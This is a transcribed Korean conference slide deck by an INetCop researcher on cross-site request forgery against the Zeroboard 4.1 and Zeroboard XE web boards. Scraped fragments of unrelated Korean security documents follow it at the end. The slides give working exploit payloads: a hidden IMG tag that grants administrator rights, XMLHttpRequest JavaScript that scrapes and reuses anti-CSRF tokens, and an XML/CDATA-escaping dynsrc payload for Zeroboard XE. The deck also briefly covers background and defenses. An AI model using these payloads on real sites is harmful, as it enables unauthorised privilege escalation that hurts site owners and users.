Web 2.0 CSRF exploitation

Size: px
Start display at page:

Download "Web 2.0 CSRF exploitation"

Transcription

1 Web 2.0 CSRF exploitation (web-board board case study) Bypassing Security Token based Anti-CSRF & Zero board XE -1day Remote exploit

2 유동훈 - Xpl017Elz (x82) - INetCop Security 연구소장 - 운영 - 연구분야 * 웹어플리케이션취약점 * 시스템어플리케이션취약점 * 시스템커널, 라이브러리취약점 * 어플리케이션취약점소스코드분석 * Proof-of of-concept exploit code 개발 - 경력 * WOKSDOME global hacking competition prize * The 1 st KJIST SeeCure-CSRL CSRL Hacking Festival prize * 해외보안회사 Snosoft 의보안권고문검증업무 * Small buffer format string attack paper 해외발표 * Advanced exploitation in exec-shield paper 해외발표

3 1. IntroductionI What made CSRF exploit rearise?

4 용어설명 - 1세대웹 (Web 1.0) (End 유저기준 ) 사용자에게게시된정보를인터넷으로제공하는고전적인웹서비스. 클라이언트가서버에서제공하는서비스만받을수있음. (Blog( 와같은개념이태어나기전게시판형태의웹서비스 ) - 2세대웹 (Web 2.0) (End 유저기준 ) 사용자참여중심의인터넷환경을뜻하며최근새로운개념으로정립. 사용자가직접데이터를다룰수있음. (Blog( Blog, Wiki 등의사용자참여형웹서비스 ) - 1세대웹과 2세대웹의구분 ( 프로그래머기준 ) AJAX 탄생. 그전과후 - 웹 (Web) 2.0 해킹사용자의웹브라우저환경을이용하는다양한웹해킹공격을뜻함. 대부분기존클라이언트를대상으로하는웹해킹기법과개념은동일하나, 용어적인차이와방법론의차이를가지고있음.

5 1-2. Cookie 인증 - Cookie 인증 1) 웹사이트가클라이언트사용자를인증하는데있어서대중적으로사용하는인증의한방식. 2) Netscape 사에서처음개발되었음. (RFC 2109) 3) DB 에지속적인인증요청을필요로하지않으므로서버의성능향상 4) 클라이언트 PC 에 Cookie 정보가저장되므로정보노출에의한인증취약점발생 - Cookie 발급과정 : 1) 사용자인증요청 Id=test&pass=password ( 클라이언트요청메시지데이터 ) 2) Database 검색을통해올바른사용자인지여부를판단 Select * from user_db where id= $id and pass= $pass (MySQL DB 의예 ) 3) 올바른사용자인경우, Cookie 데이터 ( 데이터값이큰경우 DB 에저장 ) 를사용자에게발급 Set-Cookie: user cookie data; ( 서버응답메시지헤더 ) 4) 지속적인접속유지를위해사용자브라우저가 Cookie 파일을사용자시스템에저장 C:\Documents and Settings\ 사용자 \Cookies (Windows XP 기준 ) 5) 다음요청부터발급받은 Cookie 데이터를통해정보를요청 Cookie: user cookie data; ( 클라이언트요청메시지헤더 )

6 1-3. Session 인증 - Session 인증 1) 사전적의미로는어떤특별한목적으로사용자에의해점유되는일정시간을뜻함. 2) 인증제공방식은 Cookie 인증방식과동일하나휘발성데이터형태로발급. 3) 보안성향상 (Cookie 가사용자 PC 내에저장되는것과달리 Session 데이터는서버에저장 ) 4) 클라이언트 PC 에는데이터가포함되지않은 Session 키이름만발급하여인증제공 - Session 발급과정 : 1) 사용자인증요청 Id=test&pass=password ( 클라이언트요청메시지데이터 ) 2) Database 검색을통해올바른사용자인지여부를판단 Select * from user_db where id= $id and pass= $pass (MySQL DB 의예 ) 3) 올바른사용자인경우, 서버웹어플리케이션이 Session 파일을서버시스템에저장 /tmp/sess_ 세션키이름 (PHP session_start() 함수기준 ) 4) 지속적인접속유지를위해저장된 Session Key 이름을사용자에게발급 Set-Cookie: user session key name; ( 서버응답메시지헤더 ) 5) 다음요청부터발급받은 Session Key 이름을통해정보를요청 Cookie: user session key name; ( 클라이언트요청메시지헤더 )

7 1-4. 웹해킹기법의발전형태 - Cookie Spoofing 취약점인증설정상오류를악용한 Cookie 해킹의한종류. Cookie 내의예측하기쉬운데이터정보를속여본래권한외의접근수행이가능. - Cookie Sniffing 취약점여러가지다양한방법을동원하여타인의 Cookie 데이터를가로채는해킹기법. 가로챈 Cookie 데이터를이용하여본래권한외의접근수행이가능. - XSS (Cross site script) 공격기법취약한웹페이지를이용하여 Cookie, Session sniffing 코드를포함한 URL 또는이미지링크등을사용자에게노출시켜클라이언트브라우저내의데이터를얻어오는류의해킹기법. 해당기법을이용하면사용자의 Cookie 데이터를획득하여인증우회및인증무력화공격을시도할수있음. - CSRF (Cross site Request Forgeries) 공격기법취약한웹페이지를이용하여권한을도용하는가짜요청문을클라이언트의웹브라우저상에서실행되도록유도하는해킹기법. 해당기법을이용하면타인의권한으로원하는 HTTP 요청문을수행할수있음. - XST (Cross site Tracing) 공격기법웹서버의 TRACE method 특성을이용하여접근이불가능한 Cookie 데이터를얻어오는해킹기법.

8 1-5. 보안이강화된인증기법 - HttpOnly 쿠키인증기법 클라이언트웹브라우저가 Javascript 를통해 cookie 에접근하지못하도록제어하여취약점을차단하는방법. MS 사의 IE6 SP1 웹브라우저부터지원된이보안정책은 XSS 공격을차단하기위한프로젝트의일환으로보다안전한 cookie 데이터를생성할수있다. ( 참고자료 : Mitigating Cross-site site Scripting With HTTP-only Cookies.. MSDN Library. us/library/ms aspx) - HttpOnly 쿠키무력화기법 : XST (Cross site Tracing) 공격 과거에는 XHR (XMLHttpRequest( XMLHttpRequest) 를이용한 XST 공격이가능했다. 그러나 2007 년 08 월 MS 보안업데이트가적용된이후부터는공격이주춤한상태이다. 그이유는 XMLHTTP.open() 함수가 TRACE method 를지원하지않도록변경되면서공격이어려워졌기때문이다. ( 참고자료 : Cross-Site Tracing (XST). Jeremiah Grossman. Jan ) ( 참고자료 : XS(T) attack variants which can, in some cases, eliminate the need for TRACE. Amit Klein. Jan ) ( 참고자료 : XST Strikes Back. Amit Klein. Jan )

9 1-5. 보안이강화된인증기법 - 사용자로그인 IP 체크기법 사용자의로그인인증시 IP 를세션데이터에기록한후서비스페이지에접속한 IP 와비교하여다른 IP 의접속이시도되었을경우이를차단하고 Session 을소멸시키는방법. 현재국내몇몇웹메일에적용된상태이며웹게시판중에는제로보드시스템이이러한 IP 체크기능을보안인증으로사용하고있다. ( 장점 : Cookie Spoofing, Cookie Sniffing, XSS 공격시도를차단할수있음.) - 사용자로그인 IP 체크기법 : CSRF (Cross site Request Forgeries) 공격 매서비스페이지마다접속한 IP 와비교하므로 XSS 기법으로페이지에접근하는것은불가능하다. 이러한보안인증을우회하기위해가짜요청문을클라이언트의웹브라우저상에서실행시킬수있는 CSRF 기법이재활용되었다. ( 참고자료 : Zeroboard IP session bypass XSS vulnerability. INetCop Security. Mar x zeroboard.txt)

10 2. Web 1.0 CSRF exploitation Why need CSRF exploit?

11 2. Web 1.0 CSRF 공격기법 - CSRF (Cross site Request Forgeries) 공격의역사 현재 Cross Site Reference Forgery, Session Riding, Sea Surf, iframe exploit 등그밖에다양한이름으로불리고있으나 2001 년도에처음으로발표된자료에명시된정식명칭은 Cross site Request Forgeries 이다. 해당명칭을약자로줄여 CSRF 또는 XSRF 로부르고있다. Cross-Site Request Forgeries (sea surf). Peter W. Jun Session Riding. Thomas Schreiber. Dec Cross Site Reference Forgery. Jesse Burns (isec( isec) MySpace CSRF/XSS Samy worm Zeroboard 4.1 pl7 iframe exploit. INetCop Security. Mar CSRF added as A5 on the OWASP Top 10. OWASP auction.co.kr Chinese Hacker steals user information on 18 MILLION. Feb

12 2. Web 1.0 CSRF 공격기법 - CSRF (Cross site Request Forgeries) 공격원리 제로보드 4.1 의관리자기능중게시판에가입된일반사용자의권한을관리자로변경하는 POST 요청문이다음과같다고가정하자. ( 참고로, 실제제로보드 4.1 의요청문은 multipart/form-data 형식으로넘어감 ) POST HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: Content-Length: Cookie: PHPSESSID=848db2e9c1949f6d17e0fcadc436bdc4; exec=view_member&exec2=modify_member_ok&group_no=1&member_no=2& is_admin=1&level=1&name=test& =name@addr.com&comment=test

13 2. Web 1.0 CSRF 공격기법 - CSRF (Cross site Request Forgeries) 공격원리 앞서 POST 요청문은 member_no 값이 2인 test 사용자를관리자권한으로 (is_admin 을 1로설정, level 을 1로설정 ) 설정한다. 해당요청문을사용자브라우저내에서몰래실행할수있도록 GET method 동작코드를만들면다음과같다. (<IMG> 태그나 <IFRAME>, <SCRIPT> 태그를이용하여공격코드작성이가능함 ) <IMG src= exec2=modify_member_ok&group_no=1&member_no=2&is_admin=1&level=1& name=test& =name@addr.com&comment=test width=0 height=0> 이렇게작성된 IMG 태그 (GET 요청문 ) 를관리자의웹브라우저에서실행하기위해관리자에게쪽지를보낼때삽입하거나게시글에숨겨공격을시도할수있다. 실제전달되는 GET 요청문은다음과같을것이다. GET exec2=modify_member_ok&group_no=1&member_no=2&is_admin=1&level=1& name=test& =name@addr.com&comment=test HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: Content-Length: Cookie: PHPSESSID=848db2e9c1949f6d17e0fcadc436bdc4;

14 2. Web 1.0 CSRF 공격기법 - CSRF (Cross site Request Forgeries) 공격순서 1) 권한수행시웹서버로전달되는요청문을추출한다. 2) 추출한요청문을 <IMG> 태그나 <IFRAME> 태그로재구성한다. 3) 작성한공격태그를원하는클라이언트브라우저에서실행될수있도록대상사용자의접근을유도한다. 4) 사용자가공격태그를브라우저에서실행시키면해커가원하는요청문이수행된다. 5) Cookie 나 Session Key 에대한직접적인접근없이도악의적인해커에게권한이넘어간다. - CSRF (Cross site Request Forgeries) 공격대상 인증이구현된모든웹. ( 웹게시판, 블로그, 카페, 웹메일, 웹쇼핑몰, 검색엔진등 ) 차후각종 SPAM 공격, 관리자권한획득, 검색순위조작, 웜바이러스등으로악용될소지가매우높다. ( 또한, 웹인터페이스를지원하는라우터, 공유기해킹에도사용됨 )

15 2. Web 1.0 CSRF 공격기법 - 실제 CSRF (Cross site Request Forgeries) 공격 제로보드 4.1 pl8 게시판은 IP 체크보안기능이활성화되어있어 XSS 공격을시도하기어렵다. 다음코드는로그인후세션을처리하는 /bbs/login_check.asp 코드내용중일부이다. 25 if($member_data[no]) { if($auto_login) { 28 makezbsessionid($member_data[no]); 29 } // 4.0x 용세션처리 32 $zb_logged_no = $member_data[no]; 33 $zb_logged_time = time(); 34 $zb_logged_ip = $REMOTE_ADDR; <- 로긴시, IP 기록 35 $zb_last_connect_check = '0'; 위와같이로그인시 session 데이터에기록한 IP 주소는서비스페이지접속 IP 와비교하여다를경우 session key 를소멸시킨다. 다음코드는해당역할을수행하는 /bbs/lib.php 코드내용중일부이다. 97 // 로그인시간이지정된시간을넘었거나로그인아이피가현재사용자의아이피와다를경우로그아웃시킴 98 if(time()-$http_session_vars["zb_logged_time"]>$_zbdefaultsetup["login_time"] $HTTP_SESSION_VARS["zb_logged_ip"]!=$REMOTE_ADDR) { $zb_logged_no=""; 101 $zb_logged_time=""; 102 $zb_logged_ip=""; <- 세션최기화 103 session_register("zb_logged_no");

16 - Demonstration of Web 1.0 CSRF exploitation - Zero board 4.1 pl8-1day Remote POC exploit (0x82-zer04.1pl8_CSRF.c)

17 3. Anti-CSRF Protection Security Token based Anti-CSRF Protection

18 3. Anti-CSRF 보안기법 - CSRF protection (anti-csrf) 기법소개 1) POST method only 공격을어렵게하기위해모든요청을 POST 만사용하도록권고했지만 CSRF 를차단할수있는방법은아니다. 2) Referer 체크과거에는매우효과적인방어기법이었다. 그러나 Referer 역시조작이가능하다는사실이밝혀지면서완벽한차단이힘들어졌다. ( 참고자료 : Exploiting the XmlHttpRequest object in IE - Referrer spoofing. Amit Klein. Sep ) ( 참고자료 : Sending arbitrary HTTP requests with Flash 7/8 (+IE 6.0). Amit Klein. Aug ) ( 참고자료 : HTTP Header Injection Vulnerabilities in the Flash Player Plugin.. Rapid7. Oct ) 3) One time authorization Security Token 사용 Peter W 가제안했던것처럼 action 이필요한모든서비스페이지에 Security Token 을넣어확인하는방법이다. 이기술은현재안전한보안방법으로널리알려져있는편이다. ( 참고자료 : Security Corner: Cross-Site Request Forgeries. Chris Shiflett.. Dec ) ( 참고자료 : Cross Site Reference Forgery. Jesse Burns (isec( isec). 2005)

19 3. Anti-CSRF 보안기법 - One time authorization Security Token 보안원리 Chris Shiflett 의 Token 코딩예제를보면매우쉽게이해할수있다. Action 이수행되는모든서비스페이지에추가하여 CSRF 에보다안전한웹페이지를만들수있다. <? // PHP 예제 session_start(); $tokn=md5(uniqid(rand(),true)); // 매번 random 하게생성된보안인증토큰 $_SESSION['tokn']=$tokn;?> <form action='action.php' method='post'> <input type=hidden name=tokn value='<? echo $tokn?>'> Action 이수행되는 form 에 random 하게생성된 Security Token 이 POST 로넘어오도록구성한다. 정보를입력받는페이지에서는넘어온토큰이유효한지검사하는루틴을추가한다. <? session_start(); if(isset($_session['tokn'])&&$_post['tokn']==$_session['tokn']){ 정상루틴수행 } else echo " 토큰값오류 ";?>

20 3. Anti-CSRF 보안기법 - One time authorization Security Token 보안솔루션소개 1) Anti-CSRF 루틴예제 design.com/tag/anti-csrf/ csrf/ CSRF-and-static-pages 2) Anti-CSRF 솔루션 CSRF Killer - requests-are-safe-with-us CSRF Guard -

21 4. Anti-CSRF Protection bypass! Bypass Security Token based Anti-CSRF Protection

22 4. Anti-CSRF 우회공격기법 - Anti-CSRF 우회공격의원리 다음과같이제로보드 4.1 게시판에 Anti-CSRF CSRF One time Security Token 을추가하였다. 이렇게 Security Token 이추가된웹어플리케이션은고전적인 CSRF 기법으로는공격하기어렵다. <form name=write method=post action=/bbs/admin_setup.php submit();"> <input type=hidden name=exec value=view_member> <input type=hidden name=exec2 value=modify_member_ok> <input type=hidden name=group_no value=1> <input type=hidden name=member_no value=2> <input type=hidden name=page value=1> <input type=hidden name=page_num value=10> <input type=hidden name=keykind value=> <input type=hidden name=keyword value=> <input type=hidden name=like value=> <input type=hidden name=token value=392373b9e18d e38178fc6c74> 앞서공격과같이 <IMG>, <IFRAME> 태그를이용하여공격을시도할경우, 매번 random 하게변경되는 Security Token 값을예측할수없으므로 exploit 자체가불가능하다.

23 4. Anti-CSRF 우회공격기법 - Anti-CSRF 우회공격의원리 Anti-CSRF 루틴을우회하기위해서는 AJAX 의 XMLHTTP, XHR(XMLHttpRequest) 가필요하다. XHR 를이용하면 GET/POST method 를매우편리하게사용할수있다. 고전적인 CSRF exploit 이일방적으로데이터를보내기만했다면, AJAX 의 XHR 를이용한 Web 2.0 CSRF exploit 은데이터통신이가능하다. var req = new ActiveXObject("Microsoft.XMLHTTP"); req.open("get","/bbs/admin_setup.php?exec=view_member&group_no=1&ex ec2=modify&no=2",false); // 매번새롭게생성되는 Security Token 을구함 req.send(); var token=req.responsetext; token=token.substring(token.indexof("token value=")); token=token.substring(12,token.indexof(">")); // Security Token 만추출 var req = new ActiveXObject("Microsoft.XMLHTTP"); req.open("post","/bbs/admin_setup.php",false); req.setrequestheader("content-type","application/x-www-form-urlencoded"); req.send("token="+token+"&exec=view_member&exec2=modify_member_ok&gro up_no=1&member_no=2&is_admin=1&level=1&name=exploit& =name@mail.c om&comment=test"); // POST 데이터에앞서얻은 Security Token 을추가해서보냄

24 4. Anti-CSRF 우회공격기법 - Anti-CSRF 우회공격의원리 실제제로보드에사용할경우, <IMG> 태그내에서 Javascript 를불러오면공격코드를작성할수있다. 앞서 AJAX 공격코드를 <IMG> 태그로재작성하여완성된 exploit 코드는다음과같다. <img src="javascript:var req=new ActiveXObject('Microsoft.XMLHTTP'); req.open('get','/bbs/admin_setup.php?exec=view_member&group_no=1&exe c2=modify&no=2',false); req.send(); var token=req.responsetext; token=token.substring(token.indexof('token value=')); token=token.substring(12,token.indexof('>')); var req=new ActiveXObject('Microsoft.XMLHTTP'); req.open('post','/bbs/admin_setup.php',false) req.setrequestheader('content-type','application/x-www-form-urlencoded'); req.send('token='+token+'&exec=view_member&exec2=modify_member_ok&grou p_no=1&member_no=2&is_admin=1&level=1&name=x0x& =x@0.x&comment= x0x');" width=0 height=0> 이로써 Security Token 이매번 random 하게변경되더라도아무런문제없이 exploit 이가능하다. AJAX 를이용한 Web 2.0 공격코드는이밖에도다양한곳에응용될수있을것이다. ( 기존에공격하기어려웠던 Blind CSRF exploit 이가능함 )

25 -Demonstration of Anti-CSRF bypass exploitation - Zero board 4.1 pl8 (patch version) POC exploit (0x82-zer04.1pl8_antiCSRFbypass.c)

26 5. Web 2.0 CSRF exploitation!! Zeroboard XE XMLHTTP exploit

27 5. Web 2.0 CSRF 공격기법 - 제로보드 XE CSRF (Cross site Request Forgeries) 공격 제로보드 XE 게시판역시 4.1 게시판과마찬가지로 IP 체크보안기능이활성화되어있어 XSS 공격을시도하기어렵다. 다음코드는제로보드 XE 게시판에로그인후세션을처리하는 modules/member/member.controller.php member.controller.php 코드내용중일부이다. 958 /** 959 세션정보갱신또는생성 960 **/ 961 function setsessioninfo($member_info = null) { 962 $omembermodel = &getmodel('member'); // 로그인처리를위한세션설정 986 $_SESSION['is_logged'] = true; 987 $_SESSION['ipaddress'] = $_SERVER['REMOTE_ADDR']; 988 $_SESSION['member_srl'] = $member_info->member_srl; 989 $_SESSION['is_admin'] = false; 990 참고로 $_SERVER[ REMOTE_ADDR REMOTE_ADDR ] 변수에는자동적으로웹서버에접속한클라이언트의 IP 가저장되어있다.

28 5. Web 2.0 CSRF 공격기법 - 제로보드 XE CSRF (Cross site Request Forgeries) 공격 앞서로그인시 session 데이터에기록한 IP 주소는서비스페이지접속 IP 와비교하여다를경우 session key 를소멸시킨다. 다음코드들은해당역할을수행하는코드내용일부이다. modules/member/member.model.php: /** 105 로그인되어있는지에대한체크 106 **/ 107 function islogged() { 108 if($_session['is_logged']&& $_SESSION['ipaddress']==$_SERVER['REMOTE_ADDR']) return true; 109 $_SESSION['is_logged'] = false; 110 $_SESSION['logged_info'] = ''; 111 return false; 112 }... modules/session/session.controller.php: function write($session_key, $val) { if($session_info->session_key == $session_key && $session_info->ipaddress!= $_SERVER['REMOTE_ADDR']) { 31 executequery('session.deletesession', $args); 32 return true; 33 }...

29 5. Web 2.0 CSRF 공격기법 - 제로보드 XE CSRF (Cross site Request Forgeries) 공격원리 제로보드 XE 의관리자기능중게시판에가입된일반사용자의권한을관리자로변경하는 POST 요청문은다음과같다. ( 참고로, 제로보드 XE 의 POST 요청문은 PHP XML Library 로인해데이터가 XML 엘리먼트형식으로넘어감 ) POST HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: Content-Length: Cookie: PHPSESSID=9be8b420cd6861ba7c1c4d5cc218f6db; <?xml version="1.0" encoding="utf-8"?> <methodcall> <params> <member_srl><![cdata[87]]></member_srl> <user_id><![cdata[test]]></user_id> <is_admin><![cdata[y]]></is_admin> <group_srl_list><![cdata[1]]></group_srl_list>

30 5. Web 2.0 CSRF 공격기법 - 제로보드 XE CSRF (Cross site Request Forgeries) 공격원리 제로보드 XE 는 XML 라이브러리사용으로인해고전적인 CSRF 공격기법을시도할수없다. 그이유는 XML 엘리먼트형식으로전달하는공격태그작성이힘들기때문이다. 앞서 XML 형식의요청문을사용자브라우저내에서실행할수있도록 AJAX(XMLHTTP) 로작성한코드는다음과같다. var req=new ActiveXObject("Microsoft.XMLHTTP"); req.open("post","/~board/",true); req.send("<?xml version='1.0' encoding='utf-8'?>\r\n<methodcall>\r\n<params>\r\n <member_srl><![cdata[87]]></member_srl>\r\n <user_id><![cdata[test]]></user_id>\r\n <user_name><![cdata[test]]></user_name>\r\n <nick_name><![cdata[test]]></nick_name>\r\n < _address><![cdata[x0x@x0x.x0x]]></ _address>\r\n <is_admin><![cdata[y]]></is_admin>\r\n <group_srl_list><![cdata[1]]></group_srl_list>\r\n <module><![cdata[member]]></module>\r\n <act><![cdata[procmemberadmininsert]]></act>\r\n</params>\r\n</methodcall>"); 위요청문을살펴보면 <member_srl> 값이 87 인 test 사용자를관리자권한으로 (<is_admin is_admin> 을 Y로설정, <group_srl_list< group_srl_list> 를 1로설정 ) 설정하는것을볼수있다.

31 5. Web 2.0 CSRF 공격기법 - 제로보드 XE CSRF (Cross site Request Forgeries) 공격원리 앞서 AJAX 코드를그대로 write 할경우, 오류가발생한다. 그이유는 CDATA 섹션을통해전달되는데이터에 ]]> 와같은코드가들어오기때문인데이는다음과같은문제점이발생한다. 정상적인형식 : <content><![cdata[ 게시물내용 ]]></content> 비정상적인형식 : <content><![cdata[ 게시물 ]]> 내용 ]]></content> 위와같이요청하면 ]]> 를 CDATA 섹션의끝으로인식하면서 게시물 까지만데이터로인식하고 ]]> 뒤의 내용 이라는데이터가남게되므로엘리먼트는엉망이되어버린다. 다음공격코드는이러한문제점을말끔히해결해줄것이다. <INPUT type=image width=0 height=0 dynsrc="javascript:var xmlhttp=new ActiveX Object('Microsoft.XMLHTTP');xmlhttp.open('POST','/~board/',true);xmlhttp.send(& #x22<?xml version='1.0' encoding='utf-8'?>\r\n<methodcall>\r\n<params>\r\n <member_srl><![cdata[87]&#00013]></member_srl>\r\n<user_id><![cdata[x0 x]&#00013]></user_id>\r\n<user_name><![cdata[x0x]&#00013]></user_name>\r\n <nick_name><![cdata[x0x]&#00013]></nick_name>\r\n< _address><![cdata [x0x@x0x.x0x]&#00013]></ _address>\r\n<is_admin><![cdata[y]&#00013]> </is_admin>\r\n<group_srl_list><![cdata[1]&#00013]></group_srl_list>\r\n<m odule><![cdata[member]&#00013]></module>\r\n<act><![cdata[procmemberad mininsert]&#00013]></act>\r\n</params>\r\n</methodcall>&#x22);"> 문제점해결을위해개행문자캐리지리턴 (CR) 코드를 10 진수의엑추얼캐릭터로만들어넣었다. 이렇게엑추얼캐릭터를통해 CDATA 섹션에데이터를입력할경우엘리먼트형식이망가지는것을방지할수있다.

32 5. Web 2.0 CSRF 공격기법 - Web 2.0 CSRF (Cross site Request Forgeries) 공격순서 1) 권한수행시웹서버로전달되는요청문을추출한다. 2) 추출한요청문을 AJAX 코드 (XMLHTTP) 로작성한다. 3) 작성한공격태그를원하는클라이언트브라우저에서실행될수있도록대상사용자의접근을유도한다. 4) 사용자가공격태그를브라우저에서실행시키면해커가원하는요청문이수행된다. 5) Cookie 나 Session Key 에대한직접적인접근없이도악의적인해커에게권한이넘어간다. - Web 2.0 CSRF (Cross site Request Forgeries) 보안방법 서비스페이지내에권한을사용하는중요한 action 에대해서는반드시암호를함께입력하여수행할수있도록변경한다. ( 예 : 사용자정보변경기능, 탈퇴기능, 관리자정보변경기능, 관리자권한사용기능등 ) * 추가 : CAPTCHA, recaptcha,, MAPTCHA, asirra 를통해보안적용이가능.

33 5. Web 2.0 CSRF 보안방법

34 - Demonstration of Web 2.0 CSRF exploitation - Zero board XE -1day Remote POC exploit (0x82-zer0XE_CSRF.c) + Bonus stage

35 - The End - Thanks for listening. By "dong-houn you" (Xpl017Elz), in INetCop(c). MSN & szoahc(at)hotmail(dot)com Home:

제목 레이아웃

제목 레이아웃 웹해킹이라고무시하는것들보소 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM SQL Injection 끝나지않은위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM Who am I 정도원 aka rubiya Penetration tester Web application bughuter Pwned 20+ wargame @kr_rubiya

More information

Secure Programming Lecture1 : Introduction

Secure Programming Lecture1 : Introduction Malware and Vulnerability Analysis Lecture4-1 Vulnerability Analysis #4-1 Agenda 웹취약점점검 웹사이트취약점점검 HTTP and Web Vulnerability HTTP Protocol 웹브라우저와웹서버사이에하이퍼텍스트 (Hyper Text) 문서송수신하는데사용하는프로토콜 Default Port

More information

Microsoft Word - 제로보드 XE_CSRF증명.doc

Microsoft Word - 제로보드 XE_CSRF증명.doc 제로보드 XE - CSRF 취약점증명 작성자 : eits1st 작성날짜 : 09년 3월 16일 목 차 1. 개요 1) CSRF의정의 2) 제로보드 XE 3) CSRF 테스트환경 2. 취약점증명 1) 권한상승시웹서버로전송되는 Request( 요청 ) 구문확인및추출 2) 확인된 Request( 요청 ) 구문을 AJAX(httpxml) 코드로작성 3) AJAX(httpxml)

More information

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time- EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 06월에공개된 Exploit-DB의분석결과, SQL 공격에대한보고개수가가장많았습니다. 이와같은결과로부터여전히 SQL 이웹에서가장많이사용되는임을확인할수있습니다.

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 SECUINSIDE 2017 Bypassing Web Browser Security Policies DongHyun Kim (hackpupu) Security Researcher at i2sec Korea University Graduate School Agenda - Me? - Abstract - What is HTTP Secure Header? - What

More information

C H A P T E R 2

C H A P T E R 2 C H A P T E R 2 Foundations of Ajax Chapter 2 1 32 var xmlhttp; function createxmlhttprequest() { if(window.activexobject) { xmlhttp = new ActiveXObject( Micr else if(window.xmlhttprequest) { xmlhttp =

More information

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 2012.11.23 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Document Distribution Copy Number Name(Role, Title) Date

More information

EDB 분석보고서 (04.03) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj

EDB 분석보고서 (04.03) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj EDB 분석보고서 (04.03) 04.03.0~04.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 03월에공개된 Exploit-DB의분석결과, 해커들이가장많이시도하는공격으로알려져있는 SQL Injection 공격에대한보고개수가가장많았습니다. 무엇보다주의가필요한부분은

More information

3장

3장 C H A P T E R 03 CHAPTER 03 03-01 03-01-01 Win m1 f1 e4 e5 e6 o8 Mac m1 f1 s1.2 o8 Linux m1 f1 k3 o8 AJAX

More information

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks XSS s XSS, s, May 25, 2010 XSS s 1 2 s 3 XSS s MySpace 사건. Samy (JS.Spacehero) 프로필 페이지에 자바스크립트 삽입. 스크립트 동작방식 방문자를 친구로 추가. 방문자의 프로필에 자바스크립트를 복사. 1시간 만에 백만 명이 친구등록. s XSS s 위험도가 낮은 xss 취약점을 다른 취약점과 연계하여

More information

WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진

WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진 WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진 해킹의 종류 웹해킹 네트워크 해킹 시스템(OS)해킹 웹해킹 기법 SQL INJECTION HTML INJECTION Cross Site Scripting HEADER INJECTION 웹해킹 기법 업로드 취약점 다운로드 취약점 INJECTION 나는 사람입니다. 나는

More information

EDB 분석보고서 (06.07) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취

EDB 분석보고서 (06.07) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (06.07) 06.07.0~06.07.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 06 년 7 월에공개된 Exploit-DB 의분석결과, Cross Site Scripting 공격에대한취약점보고개수가가장많았으며공격패턴도다양하게발견되었습니다.

More information

<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770> 개 요 홈페이지 해킹 현황 및 사례 홈페이지 개발시 보안 취약점 및 대책 주요 애플리케이션 보안 대책 결 론 참고자료 [부록1] 개발 언어별 로그인 인증 프로세스 예제 [부록2] 대규모 홈페이지 변조 예방을 위한 권고(안) [부록3] 개인정보의 기술적 관리적 보호조치 기준(안) [부록4] 웹 보안관련 주요 사이트 리스트 7000 6,478 6000 5000

More information

게시판 스팸 실시간 차단 시스템

게시판 스팸 실시간 차단 시스템 오픈 API 2014. 11-1 - 목 차 1. 스팸지수측정요청프로토콜 3 1.1 스팸지수측정요청프로토콜개요 3 1.2 스팸지수측정요청방법 3 2. 게시판스팸차단도구오픈 API 활용 5 2.1 PHP 5 2.1.1 차단도구오픈 API 적용방법 5 2.1.2 차단도구오픈 API 스팸지수측정요청 5 2.1.3 차단도구오픈 API 스팸지수측정결과값 5 2.2 JSP

More information

PowerPoint Template

